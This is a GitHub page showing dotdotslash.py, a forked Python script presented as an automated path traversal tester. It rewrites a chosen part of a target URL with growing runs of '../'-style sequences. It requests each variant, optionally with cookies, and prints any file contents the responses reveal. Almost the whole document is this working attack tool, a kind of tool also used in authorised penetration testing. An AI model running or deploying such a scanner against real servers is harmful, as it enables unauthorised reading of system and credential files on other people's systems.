forked from jcesarstef/dotdotslash
-
Notifications
You must be signed in to change notification settings - Fork 0
/
dotdotslash.py
106 lines (92 loc) · 3.85 KB
/
dotdotslash.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#!/usr/bin/python3
import re
import argparse
import sys
from match import dotvar, match, befvar
import requests
from http.cookies import SimpleCookie
# TODO
# add -f --file
# add --os
# http://site.com.br/some-page?page=http://other-site.com.br/
# use POST data
# mutiple headers
# solve 302 that turn 200
# save in sqlite/csv
# colors on http_code
# threads
parser = argparse.ArgumentParser(description='dot dot slash - A automated Path Traversal Tester. Created by @jcesrstef.')
parser.add_argument('--url', '-u', action='store', dest='url', required=True, help='Url to attack.')
parser.add_argument('--string', '-s', action='store', dest='string', required=True, help='String in --url to attack. Ex: document.pdf')
parser.add_argument('--cookie', '-c', action='store', dest='cookie', required=False, help='Document cookie.')
parser.add_argument('--depth', '-d', action='store', dest='depth', required=False, type=int, default='6', help='How deep we will go?')
parser.add_argument('--verbose', '-v', action='store_true', required=False, help='Show requests')
arguments = parser.parse_args()
banner = "\
_ _ _ _ _ _ \n\
__| | ___ | |_ __| | ___ | |_ ___| | __ _ ___| |__ \n\
/ _` |/ _ \| __| / _` |/ _ \| __| / __| |/ _` / __| '_ \ \n\
| (_| | (_) | |_ | (_| | (_) | |_ \__ \ | (_| \__ \ | | |\n\
\__,_|\___/ \__| \__,_|\___/ \__| |___/_|\__,_|___/_| |_|\n\
\n\
Automated Path Traversal Tester\n\
version 0.0.2\n\
Created by Julio Cesar Stefanutto (@jcesarstef)\n\
\n\
Starting run in: \033[94m" + arguments.url + "\033[0m\n\
\
"
print(banner)
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class request(object):
def query(self, url, cookie=None):
if cookie:
rawdata = "Cookie: " + cookie
cookie = SimpleCookie()
cookie.load(rawdata)
req = requests.get(url, cookies=cookie, allow_redirects=False)
self.raw = req.text
self.code = req.status_code
def forloop():
if str(arguments.string) not in str(arguments.url):
sys.exit("String: " + bcolors.WARNING + arguments.string + bcolors.ENDC + " not found in url: " + bcolors.FAIL + arguments.url + "\n")
count = 0
duplicate = []
while (count != (arguments.depth + 1)):
print("[+] Depth: " + str(count))
for var in dotvar:
for bvar in befvar:
for word in match.keys():
rewrite = bvar + (var * count) + word
fullrewrite = re.sub(arguments.string, rewrite, arguments.url)
if fullrewrite not in duplicate:
req = request()
req.query(fullrewrite)
catchdata = re.findall(str(match[word]), req.raw)
if (len(catchdata) != 0):
print(bcolors.OKGREEN + "\n[" + str(req.code) + "] " + bcolors.ENDC + fullrewrite)
print(" Contents Found: " + str(len(catchdata)))
else:
if arguments.verbose:
print("[" + str(req.code) + "] " + fullrewrite)
icount = 0
# Print match
for i in catchdata:
print(" " + bcolors.FAIL + str(i) + bcolors.ENDC)
icount = icount + 1
if (icount > 6):
print(" [...]")
break
if arguments.verbose:
time.sleep(0)
duplicate.append(fullrewrite)
count += 1
forloop()